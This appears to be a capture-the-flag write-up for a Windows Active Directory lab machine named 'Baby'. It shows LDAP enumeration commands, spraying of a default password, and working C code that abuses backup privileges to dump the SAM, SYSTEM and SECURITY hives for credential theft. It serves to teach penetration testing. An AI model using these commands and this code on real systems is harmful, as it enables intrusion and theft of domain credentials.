🚼Baby
You will learn about LDAP-Enumeration & Windows Privileges
IP: 10.10.117.218
Enumeration
This is a standalone machine
One thing we can do after scanning ports is scan ldap using nmap
nmap -n -sV --script "ldap* and not brute" 10.10.117.218 -vv -oN nmap/ldapsearch -Pn
Here we get the informations about the domain, the machine name, ldap policies and AD users
We can check if anonymous LDAP bind is enabled so we can enumerate users from there
ldapsearch -H ldap://baby.vl:3268/ -x -b "dc=baby,dc=vl" "user" | grep cn
We now have a list of users present in the Active directory
Now if we remove user from the command, ldapsearch -H ldap://baby.vl:3268/ -x -b "dc=baby,dc=vl" we see more informations about every user for example the descriptions
BabyStart123! is probably the default password that is set for this or other accounts
We can create a list of users and spray the password
It did not work
But looking again at the users we also find Caroline.Robinson that for some reason did not have a user principal name so the command used to cat the users did not display her
Now using crackmapexec we see that her password needs to be changed
We can use Impacket’s smpasswd to change her password
Privilege Escalation
Now enumerating the privileges of this user we can see that SeBackupPrivilegeand SeRestorePrivilegeare enabled probably because this user is a Backup operator
We can copy SAM and SYSTEM but we also need ntds.dit
We can use a script that mounts the c drive to a E: drive using the diskshadow utility
But for some unknown reasons after trying countless times it did not work
So i used this code to copy the different hives to C:\Windows\Temp
#include <stdio.h>
#include <Windows.h>
void MakeToken() {
HANDLE token;
const char username[] = "Caroline.Robinson";
const char password[] = "Password123!";
const char domain[] = "baby.vl";
if (LogonUserA(username, domain, password, LOGON32_LOGON_NEW_CREDENTIALS, LOGON32_PROVIDER_DEFAULT, &token) == 0) {
printf("LogonUserA: %d\n", GetLastError());
exit(0);
}
if (ImpersonateLoggedOnUser(token) == 0) {
printf("ImpersonateLoggedOnUser: %d\n", GetLastError());
exit(0);
}
}
int main()
{
HKEY hklm;
HKEY hkey;
DWORD result;
const char* hives[] = { "SAM","SYSTEM","SECURITY" };
const char* files[] = { "C:\\windows\\temp\\sam.hive","C:\\windows\\temp\\system.hive","C:\\windows\\temp\\security.hive" };
//Uncomment if using alternate credentials.
MakeToken();
result = RegConnectRegistryA("\\\\baby.vl", HKEY_LOCAL_MACHINE, &hklm);
if (result != 0) {
printf("RegConnectRegistryW: %d\n", result);
exit(0);
}
for (int i = 0; i < 3; i++) {
printf("Dumping %s hive to %s\n", hives[i], files[i]);
result = RegOpenKeyExA(hklm, hives[i], REG_OPTION_BACKUP_RESTORE | REG_OPTION_OPEN_LINK, KEY_READ, &hkey);
if (result != 0) {
printf("RegOpenKeyExA: %d\n", result);
exit(0);
}
result = RegSaveKeyA(hkey, files[i], NULL);
if (result != 0) {
printf("RegSaveKeyA: %d\n", result);
exit(0);
}
}
}
Now we get the NT hash of the machine account babydc$
Then login with the Administrator account and we are DA
Last updated
Was this helpful?